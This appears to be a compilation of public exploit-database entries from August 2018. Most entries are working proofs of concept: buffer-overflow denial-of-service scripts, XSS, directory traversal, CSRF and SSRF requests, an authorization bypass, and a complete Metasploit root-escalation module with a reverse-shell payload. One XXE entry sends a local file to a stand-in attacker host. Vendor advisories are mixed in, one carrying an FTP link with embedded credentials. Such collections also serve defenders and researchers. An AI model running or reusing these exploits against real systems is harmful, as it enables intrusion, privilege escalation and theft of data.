# Exploit Title: Easy PhotoResQ 1.0 - Denial Of Service (PoC)
# Author: Gionathan "John" Reale
# Discovey Date: 2018-08-29
# Homepage: https://www.hdtune.com/
# Software Link: https://www.hdtune.com/download.html
# Tested Version: v1.0
# Tested on OS: Windows 7 32-bit
# Steps to Reproduce: Run the python exploit script, it will create a new 
# file with the name "exploit.txt". Copy the content of the new file "exploit.txt". 
# Now start the program. Now when you are inside of the program click "File"> "Options". In the field: "Folder / filename" paste the copied content from "exploit.txt". 
# Now click "OK" and see a crash!  

#!/usr/bin/python

buffer = "A" * 6000

payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

#Exploit Title: Trillian 6.1 Build 16 - "Sign In" Denial of service (PoC)
#Discovery by: Jose Miguel Gonzalez
#Discovery Date; 2018-08-29
#Vendor Homepage: https://www.trillian.im/
#Software Link: https://www.trillian.im/download/
#Tested Version: 6.1 Build 16
#Tested on OS: Windows 10 Single Language x64

#Steps to produce the crash
#1.- Run the python code: trillian.py
#2.- Open trillian.txt and copy context to clipboard
#3.- Open Trillian application
#4.- Paste clipboard on "Username"
#5.- Put "1234" on "Password"
#5.- Sign In
#6.- Crashed

mem = "\x41" * 214
f = open ("trillian.txt", "w")
f.write(mem)
f.close()

#Exploit Title: NetworkActiv Web Server 4.0 Pre-Alpha-3.7.2 - 'Username' Denial of Service (PoC)
#Discovery by: Victor MondragA3n
#Discovery Date: 2018-08-30
#Vendor Homepage: https://www.networkactiv.com/WebServer.html
#Software Link: https://www.networkactiv.com/Dev/
#Tested Version: 4.0 Pre-Alpha-3.7.2
#Tested on: Windows 10 Single Language x64

#Steps to produce the crash:
#1.- Run python code: NetworkActiv_Web_Server_4.0_PA_3.7.2.py
#2.- Open Network.txt and copy content to clipboard
#2.- Open NetworkActiv Web Server 4.0 
#3.- Select Security options 
#4.- Select "Set username" and Paste ClipBoard on "New Value"
#6.- Select "Set password" and Put "1234" on "New Value"
#7.- Crashed

cod = "\x41" * 11250

f = open('Network.txt', 'w')
f.write(cod)
f.close()

# Exploit Title: Nord VPN <= 6.14.31 - Denial of Service (PoC)
# Exploit Author : L0RD (borna nematzadeh)
# Contact: borna.nematzadeh123@gmail.com
# Date: 2018-08-30
# Vendor Homepage : https://nordvpn.com
# Software link: https://nordvpn.com/download/
# Version: <= 6.14.31
# Tested on: Windows 10
# CVE: N/A

# Steps to reproduce:
# 1) Run the python exploit code and open "nord.txt" file
# 2) Copy the content of file
# 3) Open Nord vpn
# 4) Put anything (like test@test.com) into username field and paste content of "nord.txt" into password
# 5) Crash!

#!/usr/bin/python

buffer = "\x41" * 100000
f = open ("nord.txt", "w")
f.write(buffer)
f.close()
print "File created"

# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Directory Traversal
# Date: 2018-08-29
# Exploit Author: Emre AVANA
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows
# CVE: CVE-2018-16133

# PoC
https://<host>\..\..\..\..\Windows\win.ini

# CVE-2018-16133
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16133
https://github.com/EmreOvunc/CyBroHttpServer-v1.0.3-Directory-Traversal
https://emreovunc.com/blog/en/CyBroHttpServer-v.1.0.3-Directory-Traversal-3.png

GET \..\..\..\..\Windows\win.ini HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

# Exploit Title: Cybrotech CyBroHttpServer 1.0.3 - Cross-Site Scripting
# Date: 2018-08-29
# Exploit Author: Emre AVANA
# Vendor Homepage: http://www.cybrotech.com/
# Software Link: http://www.cybrotech.com/wp-content/uploads/2016/11/CyBroHttpServer-v1.0.3.zip
# Version: v1.0.3
# Tested on: Windows
# CVE-2018-16134

# PoC
http://<host>/<script>alert('xss');</script>

GET <script>alert('xss');</script> HTTP/1.1
Host: 192.168.43.102:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:61.0) Gecko/20100101
Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

# Exploit Title: WordPress Plugin Quizlord 2.0 - Cross-Site Scripting
# Date: 2018-08-29
# Exploit Author: Renos Nikolaou
# Software Link: https://downloads.wordpress.org/plugin/quizlord.zip
# Version: 2.0
# Tested on: Kali Linux
# CVE: N/A
# Description : Quizlord is prone to Stored Cross Site Scripting vulnerabilities 
# because it fails to properly sanitize user-supplied input.

# PoC - Stored XSS - Parameter: title
# 1) Login as a user who have access to Jibu Pro plugin.
# 2) Quizlord --> Add a Quiz.
# 3) At the title type: poc"><script>alert(1)</script>  , then fill the remaining fields and click Save. 
#   (The first pop-up will appear. Also keep note of the shortcode: [quizlord id="#"])
# 4) Copy the Shortcode [quizlord id="#"] into any post or page and visit the it via browser.

# Post Request (Step 3):

POST /wordpress/wp-admin/admin.php HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://domain.com/wordpress/wp-admin/admin.php?page=quizlord
Cookie: wordpress_295cdc576d46a74a4105db5d33654g45
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 188

action=ql_insert&title=poc"><script>alert(1)</script>&description=&time=0&numbtype=numerical&numbmark=&rightcolor=00FF00&wrongcolor=FF0000&showtype=paginated&addquiz=Save

# Exploit Title: WordPress Plugin Jibu Pro 1.7 - Cross-Site Scripting
# Google Dork: inurl:"/wp-content/plugins/jibu-pro"
# Date: 2018-08-29
# Exploit Author: Renos Nikolaou
# Software Link: https://downloads.wordpress.org/plugin/jibu-pro.1.7.zip
# Version: 1.7
# Tested on: Kali Linux
# CVE: N/A
# Description: Jinu Pro is prone to Stored Cross Site Scripting vulnerabilities 
# because it fails to properly sanitize user-supplied input.

# PoC - Stored XSS - Parameter: name
# 1) Login as a user who have access to Jibu Pro plugin.
# 2) Jibu-Pro --> Create Quiz.
# 3) At the Quiz Name type: poc"><script>alert(1)</script>  , then fill the remaining fields and click Save. 
#   (The first pop-up will appear. Also keep note of the shortcode, similar to: [Test Number])
# 4) Click Create New Questions, fill the fields and click Save.
# 5) Copy the Shortcode [Test Number] into any post or page and visit the it via browser.

# Post Request (Step 3):

POST /wordpress/wp-content/plugins/jibu-pro/quiz_action.php HTTP/1.1
Host: domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://domain.com/wordpress/wp-admin/edit.php?page=jibu-pro%2Fquiz_form.php&action=new
Cookie: wordpress_295cdc576d46a74a4105db5d33654g45
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 512

name=poc"><script>alert(1)</script>&description=poc&passedMark=3&no_of_ques=3&content=Congrats&_wpnonce=c2414882de&_wp_http_referer=/wordpress/wp-admin/edit.php?page=jibu-pro/quiz_form.php&action=new&action=new&quiz=&user_ID=1&submit=Save

#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product:  ownCloud Impersonate
# Vendor:   ownCloud
# CSNC ID:  CSNC-2018-015
# CVE ID:   N/A
# Subject:  Authorization bypass
# Risk:     High
# Effect:   Remotely exploitable
# Author:   Thierry Viaccoz <thierry.viaccoz@compass-security.com>
# Date:     29.08.2018
#
#############################################################


Introduction:
-------------
ownCloud [1] is a suite of client-server software for creating file hosting services and using them. An app called Impersonate [2] was created to allow administrators to impersonate other users.

According to the documentation [3], group admins should only be able to access users of the groups they are administrator of.

Compass Security discovered that it was possible for a group admin to impersonate any user, except global administrators.

This way, group admins have access to data of users of other groups, even though they shouldn't.


Affected:
---------
Vulnerable:
 * Version 0.1.2

Not vulnerable:
 * Version 0.2.0

No other version was tested, but it is believed for the older versions to be vulnerable too.


Technical Description
---------------------
In order to reproduce the vulnerability, follow the steps below.

Create two groups:
 * group1
 * group2

Create four users as follows:
 * test1; group = group1; group admin = group1
 * test2; group = group1; group admin = no group
 * test3; group = group2; group admin = group2
 * test4; group = group2; group admin = no group

Activate the Impersonate app in Settings > Admin > Apps.

Go to Settings > Admin > Apps > User Authentication, check "Allow group admins to impersonate users from these groups" and add the two groups "group1" and "group2".

Log in with "test1", open the user page and impersonate the user "test2". There, intercept the POST request to /apps/impersonate/user and replace "target=test2" by "target=test3" in the body as shown below.

As a result, the user "test1" will impersonate the user "test3", even though "test1" is only group admin of "group1" and "test3" is not in this group.

Request:
=========
POST /apps/impersonate/user HTTP/1.1
Host: demo.owncloud.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
requesttoken: [CUT]
OCS-APIREQUEST: true
X-Requested-With: XMLHttpRequest
Content-Length: 12
Cookie: [CUT]
Connection: close

target=test3
=========

Response:
=========
HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Length: 2
Content-Security-Policy: default-src 'none';manifest-src 'self';script-src 'self''unsafe-eval';style-src 'self''unsafe-inline';img-src 'self' data: blob:;font-src 'self';connect-src 'self';media-src 'self'
Content-Type: application/json; charset=utf-8
Date: Thu, 15 Mar 2018 15:21:14 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache
Strict-Transport-Security: max-age=15768000; preload
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: none
X-Xss-Protection: 1; mode=block
Connection: close

[]
=========


Workaround / Fix:
-----------------
Check the authorization consistently to prevent group admins to be able to impersonate users from other groups.


Timeline:
---------
2018-08-29:     Coordinated public disclosure date
2018-04-17:     Release of fixed version 0.2.0
2018-03-16:     Initial vendor response
2018-03-16:     Initial vendor notification
2018-03-15:     Discovery by Thierry Viaccoz


References:
-----------
[1] https://owncloud.org/
[2] https://marketplace.owncloud.com/apps/impersonate
[3] https://doc.owncloud.org/server/10.0/admin_manual/issues/impersonate_users.html

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'Network Manager VPNC Username Privilege Escalation',
'Description'    => %q{
        This module exploits an injection vulnerability in the Network Manager
        VPNC plugin to gain root privileges.

        This module uses a new line injection vulnerability in the configured
        username for a VPN network connection to inject a `Password helper`
        configuration directive into the connection configuration.

        The specified helper is executed by Network Manager as root when the
        connection is started.

        Network Manager VPNC versions prior to 1.2.6 are vulnerable.

        This module has been tested successfully with VPNC versions:
        1.2.4-4 on Debian 9.0.0 (x64); and
        1.1.93-1 on Ubuntu Linux 16.04.4 (x64).
      },
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Denis Andzakovic', # Discovery and exploit
'Brendan Coles'     # Metasploit
        ],
'DisclosureDate' => 'Jul 26 2018',
'References'     =>
        [
          ['CVE', '2018-10900'],
          ['URL', 'http://seclists.org/oss-sec/2018/q3/51'],
          ['URL', 'https://pulsesecurity.co.nz/advisories/NM-VPNC-Privesc'],
          ['URL', 'https://gitlab.gnome.org/GNOME/NetworkManager-vpnc/commit/07ac18a32b4'],
          ['URL', 'https://security-tracker.debian.org/tracker/CVE-2018-10900'],
          ['URL', 'https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-10900.html'],
          ['URL', 'https://launchpad.net/ubuntu/+source/network-manager-vpnc/0.9.8.6-1ubuntu2.1'],
          ['URL', 'https://www.debian.org/security/2018/dsa-4253'],
          ['URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=1605919'],
          ['URL', 'https://bugzilla.novell.com/show_bug.cgi?id=1101147']
        ],
'Platform'       => 'linux',
'Arch'           => [ARCH_X86, ARCH_X64],
'SessionTypes'   => ['shell', 'meterpreter'],
'Targets'        => [['Auto', {}]],
'DefaultOptions' =>
        {
'PAYLOAD'     => 'linux/x86/meterpreter/reverse_tcp',
'WfsDelay'    => 10,
'PrependFork' => true
        },
'DefaultTarget'  => 0))
    register_options [
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    cmd_exec "chmod +x '#{path}'"
  end

  def check
    unless command_exists? 'nmcli'
      vprint_error 'Network Manager nmcli utility is not installed'
      return CheckCode::Safe
    end
    vprint_good 'nmcli utility is installed'

    CheckCode::Detected
  end

  def exploit
    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    if check != CheckCode::Detected
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    @payload_name = ".#{rand_text_alphanumeric rand(10..15)}"
    payload_path = "#{base_dir}/#{@payload_name}"

    print_status 'Adding VPN connection...'
    vpn_data = []
    vpn_data << '+vpn.data "IKE DH Group = dh2"'
    vpn_data << "+vpn.data 'IPSec ID = #{rand_text_alphanumeric 5..10}'"
    vpn_data << '+vpn.data "IPSec gateway = 127.0.0.1"'
    vpn_data << '+vpn.data "IPSec secret-flags = 4"'
    vpn_data << '+vpn.data "Local Port = 0"'
    vpn_data << '+vpn.data "NAT Traversal Mode = natt"'
    vpn_data << '+vpn.data "Perfect Forward Secrecy = server"'
    vpn_data << '+vpn.data "Vendor = cisco"'
    vpn_data << '+vpn.data "Xauth password-flags = 4"'
    vpn_data << "+vpn.data \"Xauth username = #{rand_text_alphanumeric 5..10}\nPassword helper #{payload_path}\""
    vpn_data << "+vpn.data 'ipsec-secret-type = #{rand_text_alphanumeric 5..10}'"
    vpn_data << "+vpn.data 'xauth-password-type = #{rand_text_alphanumeric 5..10}'"
    res = cmd_exec "nmcli connection add con-name #{@payload_name} type vpn ifname '*' vpn-type vpnc -- #{vpn_data.join('')}"
    if res.include? 'Error'
      fail_with Failure::Unknown, 'Could not create VPN connection'
    end

    res = cmd_exec 'nmcli connection'
    unless res.include? @payload_name
      fail_with Failure::Unknown, 'Could not create VPN connection'
    end

    print_status 'Uploading payload...'
    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Starting VPN connection...'
    cmd_exec "nmcli connection up #{@payload_name} & echo "
  end

  def cleanup
    print_status 'Removing VPN connection...'
    res = cmd_exec "nmcli connection delete #{@payload_name}"
    unless res.include? 'successfully deleted'
      print_warning "Could not remove VPN connection #{@payload_name}"
    end
    super
  end
end

# Exploit Title: Acunetix WVS Reporter 10.0 - Denial of Service (PoC)
# Exploit Author: Ali Alipour
# Date: 2018-08-22
# Vendor Homepage : https://www.acunetix.com/
# Tested on : Windows 10 - 64-bit

# Steps to Reproduce
# Run the python exploit script, it will create a new 
# file with the name "exploit.txt" just copy the text inside "exploit.txt"
# and start the Acunetix WVS Reporter 10.0 program. 
# In the new window click "Report Preview"> "Load Report". 
# And upload a sample report >> Then click on the print button .
# Now Paste the content of "exploit.txt" into the field: " Pages ". 
# Click "OK" and you will see a Crash.

#!/usr/bin/python

buffer = "A" * 20
payload = buffer
try:
    f=open("exploit.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

################################################
#Title: AZORult Stealer v2 Botnet - SQL injection
#Credit: Bilal KARDADOU
#URL: https://www.rekings.com/shop/azorult-stealer/
#Product: 'AZORult Stealer v2 Botnet'
#Type: Paid
#Google Dork: N/A
################################################
#
#  Description:
#   Stealer of stored passwords, cookies, autocomplete from browsers:
#   Google Chrome, Mozilla Firefox, Internet Explorer, Microsoft Edge,
YandexBrowser, Opera, InternetMailRu, ComodoDragon, Amigo, Bromium,
Chromium, 360Browser, Nichrome, RockMelt, #  Vivaldi,GoBrowser, Sputnik,
Kometa, Uran, QIPSurf, Epic, Brave, CocCoc, CentBrowser, 7Star,
ElementsBrowser, TorBro, Suhba, SaferBrowser, Mustangm Superbird, Chedot,
Torch, Waterfox, Cyberfox, Comodo IceDragon, PaleMoon
#   (Cookies in Netscape format, in the admin panel they are converted into
JSON)
#
#   Stealer of stored passwords:
#   Outlook, Thunderbird, Filezilla, WinSCP
#   Pidgin, PSI, PSI Plus, Skype, Telegram
#   Steam ( ssfn + vdf)
#   Anoncoin, Armory, BBQcoin, Bitcoin Core, Bytecoin, Craftcoin, DashCoin,
Devcoin, Digitalcoin, Electrum, Fastcoin, Feathercoin, Florincoin, Franko,
Freicoin, GoldCoin, IoCoin, Litecoin, Mincoin, Monero, MultiBit, namecoin,
NovaCoin, Phoenixcoin, PPCoin, primecoin, ProtoShares, Quarkcoin, Tagcoin,
Terracoin, Worldcoin, Yacoin, Zetacoin
#
# --Method=GET -p [search]
#
#  -u "
http://127.0.0.1/index.php?status=0&datefrom=&dateup=&search=a[SQLI]&cookiesearch=&page=reports
"
#
#  PoC:
#  https://prnt.sc/kp4otu
#
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################

# Title: Vox TG790 ADSL Router - Cross-Site Scripting
# Author: Cakes
# Exploit Date: 2018-08-01
# Vendor: Vox Telecom
# Link: https://www.vox.co.za/
# Firmware Version: 6.2.W.1
# CVE: N/A

# Description
# Due to improper user iunput management low privilege users are able to create 
# a persistent Cross-Site scripting attack via the phone book function. 

# PoC
POST /cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name= HTTP/1.1
Host: 192.168.1.254
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://192.168.1.254/cgi/b/_voip_/pb/?be=0&l0=2&l1=1&name=
Authorization: Digest username="cakes", realm="SpeedTouch", nonce="0745EHNLF:00-1D-68-52-6C-37:173934:292999", uri="/cgi/b/_voip_/phonebook/?be=0&l0=2&l1=1&name=", response="ab09b54d4b6369496463eb79cfb4b1c2", qop=auth, nc=0000002a, cnonce="8305e26a71dd0ae2"
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 141

0=10&1=&100=Cakes&101=Cakes&102=123123&103=123123123&104=123123&105=123123&106=<script>altert("TESTER");</script>

# Response
HTTP/1.0 200 OK
Cache-Control: no-cache
Expires: -1
Content-Type: text/html

# Exploit Title: DamiCMS 6.0.0 - Cross-Site Request Forgery (Change Admin Password)
# Author: Autism_JH
# Date: 2018-08-30
# Vendor Homepage: https://github.com/731276192/damicms
# Software Link: https://github.com/731276192/damicms
# Version: 6.0.0
# CVE: CVE-2018-15844

# Description:
# DamiCMS v6.0.0 allows CSRF to change the administrator account's pssword.
# After the administrator login in,open the poc,the administrator account's 
# password will been changed to 123123

# POC:
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://Target/dami/admin.php?s=/Admin/doedit" method="POST">
<input type="hidden" name="username" value="admin" />
<input type="hidden" name="password" value="123123" />
<input type="hidden" name="role_id" value="1" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="Submit" value="ASS¡®AY=®šA$?¿®A|”¹" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

CA20180829-02: Security Notice for CA Unified Infrastructure Management

Issued: August 29, 2018
Last Updated: August 29, 2018

CA Technologies Support is alerting customers to multiple potential 
risks with CA Unified Infrastructure Management. Multiple 
vulnerabilities exist that can allow an attacker, who has access to 
the network on which CA UIM is running, to run arbitrary CA UIM 
commands on machines where the CA UIM probes are running.  An attacker 
can also gain access to other machines running CA UIM and access the 
filesystems of those machines.

The first vulnerability, CVE-2018-13819, has a medium risk rating and 
concerns a hardcoded secret key, which can allow an attacker to access 
sensitive information.

The second vulnerability, CVE-2018-13820, has a medium risk rating and 
concerns a hardcoded passphrase, which can allow an attacker to access 
sensitive information.

The third vulnerability, CVE-2018-13821, has a high risk rating and 
concerns a lack of authentication, which can allow a remote attacker 
to conduct a variety of attacks, including file reading/writing.


Risk Rating

Cumulative risk rating of High.


Platform(s)

All supported platforms


Affected Products

CA Unified Infrastructure Management 8.5.1, 8.5, 8.4.7


Unaffected Products

CA Unified Infrastructure Management 8.5.1, 8.5, 8.4.7 with the 
solutions listed below applied. 


How to determine if the installation is affected

Review the UIM Vulnerability Patch 1 documentation [1] to determine if 
all appropriate patches have been applied.  Additionally, review 
KB000111575: CA UIM Best Practices For Secure Environments [2] and CA 
UIM Best Practices for Securing Environments to mitigate 
CVE-2018-13821 [3] to ensure that all best practices have been 
implemented.


Solution

Two solutions are available for CA UIM 8.5.1, CA UIM 8.5, and CA UIM 
8.4.7 to resolve these vulnerabilities.  Both solutions, UIM 
Vulnerability Patch 1, and UIM Best Practices for Secure Environments, 
must be implemented to effectively mitigate all three vulnerabilities.

* CA recommends installing UIM Vulnerability Patch 1 [1] to resolve 
CVE-2018-13819 and CVE-2018-13820 as soon as possible.  From the 
download link, select the directory that corresponds to your release 
to access the patch package.

* CA recommends securing the CA UIM deployment using the best 
practices described in KB000111575: CA UIM Best Practices For Secure 
Environments [2] and CA UIM Best Practices for Securing Environments 
to mitigate CVE-2018-13821 [3].

- -OR-

If you feel the best practice recommendations are insufficient for 
your specific security needs, please contact CA Support to install and 
configure the CA UIM Secure Bus 8.01.

Note: While the secured version of the message bus has additional 
security features (e.g. encrypting all UIM traffic from robot to hub), 
the implementation requires additional prerequisites (such as 
requiring user-provided, signed X.509 certificates) and may have 
reduced functionality compared to the standard message bus. 

Customers running any End of Service (EOS) release are strongly 
advised to upgrade to version 8.5.1 and take the remediation actions 
listed above to resolve the vulnerabilities immediately.  

For the most up-to-date information about these CA Unified 
Infrastructure Management vulnerabilities, and for other important 
product information, please see the CA Unified Infrastructure 
Management Support page [4].


References

CVE-2018-13819 - CA UIM hardcoded secret key
CVE-2018-13820 - CA UIM hardcoded passphrase
CVE-2018-13821 - CA UIM lack of authentication
[1] ftp://UIMuser:CnIa24uJ@ftp.ca.com/Important Hotfixes/UIM Vulnerability
Patch 1/
[2]
https://comm.support.ca.com/kb/ca-uim-best-practices-for-secure-environment
s/kb000111575
[3] https://support.ca.com/phpdocs/7/8384/8384-critical-alert-0716-2016.pdf
[4]
https://support.ca.com/us/product-information/ca-unified-infrastructure-man
agement.html

Acknowledgement

CVE-2018-13819 - Oystein Middelthun
CVE-2018-13820 - Oystein Middelthun
CVE-2018-13821 - Oystein Middelthun


Change History

Version 1.0: 2018-08-29 - Initial Release


Customers who require additional information about this notice may
contact CA Technologies Support at https://support.ca.com/

To report a suspected vulnerability in a CA Technologies product,
please send a summary to CA Technologies Product Vulnerability
Response at vuln <AT> ca.com

Security Notices and PGP key
support.ca.com/irj/portal/anonymous/phpsbpldgpg
www.ca.com/us/support/ca-support-online/documents.aspx?id=177782

Regards,
Ken Williams
Vulnerability Response Director, Product Vulnerability Response Team
CA Technologies | 520 Madison Avenue, 22nd Floor, New York NY 10022


Copyright (c) 2018 CA. 520 Madison Avenue, 22nd Floor, New York, NY
10022.  All other trademarks, trade names, service marks, and logos
referenced herein belong to their respective companies.

-----BEGIN PGP SIGNATURE-----
Version: Encryption Desktop 10.3.2 (Build 15238)
Charset: utf-8

wsFVAwUBW4lr9LlJjor7ahBNAQiHAQ/+Oa5yOCsJ6MQukur5th1zeMOyvfWE3SWX
UDY44DTe7nN3QwzyYJgBBoegxuR0UuvH1Pkd/9t26KKA7z1HD9jbRI/1TLSyRUjX
TLoMHDmmPybDPA1R3s4F92ix0B8kk0pszpLvtTcTPb8jyfuML9KlqLeKQkB4p7Dq
VuhJkm3hpWzT6ZGDqWxxWEWP5GxZbAbtFa9lyp6fm+HUOVlwo7bqqcLQ1/l4gXJD
AdVF7+/6zwW31X4llCuZbhuzqLOHb4JUbAYQG3AB3+QKHBbLs+FFVpELbnPho9gA
+8ZMtUEkLY0NNYedOZ+24SpMMF1uW9ferLwTHU7vTqDbjJ8Njyzzn3zJzGqUTgnN
9PW1eqwTtEQd2S0w7QFn3Uo+h8AKDjKfM+jSyYIOJ3seazvf7hWsIJgfMtkn69yP
N7leBnQcaIB/Gljd1k5JBGgYP+JkZBfsJToW30w87BM76GoHpqZ6Xirby03WoWEI
OGqlSCc601kQdtmnK3vMcfSIz23BDO+zDZssWMRzcmQ1abZ1BYy2/iPqVaj+60zm
sRr+t3l5n4rHVZ3PXzUQ4YcG1+lW2JEamTUycqvv7ZohRQWtCGtrhY1+8/jAYb8W
DQZiCIilEYpynjRbCVndTB9MU7Kzy/1aDBgceOiaGQ4ajbXnTXkHb2DnCrA524WC
TdSsroSnvLQ=
=5XBW
-----END PGP SIGNATURE-----

[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/FSPRO-LABS-EVENT-LOG-EXPLORER-XML-INJECTION-INFO-DISCLOSURE.txt
[+] ISR: ApparitionSec          

Greetz: ***Greetz: indoushka | Eduardo***


[Vendor]
www.eventlogxp.com


[Product]
Event Log Explorer v4.6.1.2115

Event Log Explorer is an effective software solution for viewing, analyzing and monitoring events recorded in Microsoft Windows event logs.


[Vulnerability Type]
XML External Entity Injection


[Affected Component]
elex.exe


[CVE Reference]
CVE-2018-16252


[Security Issue]
Upon opening a specially crafted .ELX file in Event Log Explorer, remote attackers can potentially gain access to local files.


[Impact]
Information Disclosure


[Exploit/POC]
python -m SimpleHTTPServer

"test.elx"

<?xml version="1.0"?>
<!DOCTYPE gga [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://HACKER-IP:8000/payload.dtd">
%dtd;]>
<infodisclosa>&send;</infodisclosa>


"payload.dtd"

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://HACKER-IP:8000?%file;'>">
%all;


[Network Access]
Remote



[Severity]
High


[Disclosure Timeline]
Vendor Notification: August 19, 2018
Vendor created ticket: August 19, 2018
No further replys
September 1, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

CVE: CVE-2018-16307
Issue: Out-of-band resource load
Product affected: MIWiFi Xiaomi_55DD Version 2.8.50

Summary:
An "Out-of-band resource load" issue was discovered on Xiaomi MIWiFi Xiaomi_55DD Version 2.8.50 devices. It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response. If a domain name (containing a random string) is used in the HTTP Host header, the application performs an HTTP request to the specified domain. The response from that request is then included in the application's own response.

## Request

POST /cgi-bin/luci/api/xqsystem/login HTTP/1.1
Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.31.1/cgi-bin/luci/web/home
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 126
Cookie: __guid=86847064.3826147368769525000.1535781606575.13; monitor_count=9; psp=admin|||2|||0
Connection: close

username=admin&password=b2e8d6e552db587f3c283ce59c4d08fcbaf2cc9e&logtype=2&nonce=0_4c%3Abb%3A58%3A47%3A39%3A84_1535785091_2732

## Response

HTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 62
Connection: close
Server: Burp Collaborator https://burpcollaborator.net/
X-Collaborator-Version: 4
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache
MiCGI-Switch: 1 0
MiCGI-TproxyInfo: 192.168.31.1:80
MiCGI-Upstream: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
MiCGI-Client-Ip: 192.168.31.237
MiCGI-Host: j0kocasi9na1hy5qb3uc8zmk8be42xqpsdi08ox.burpcollaborator.net
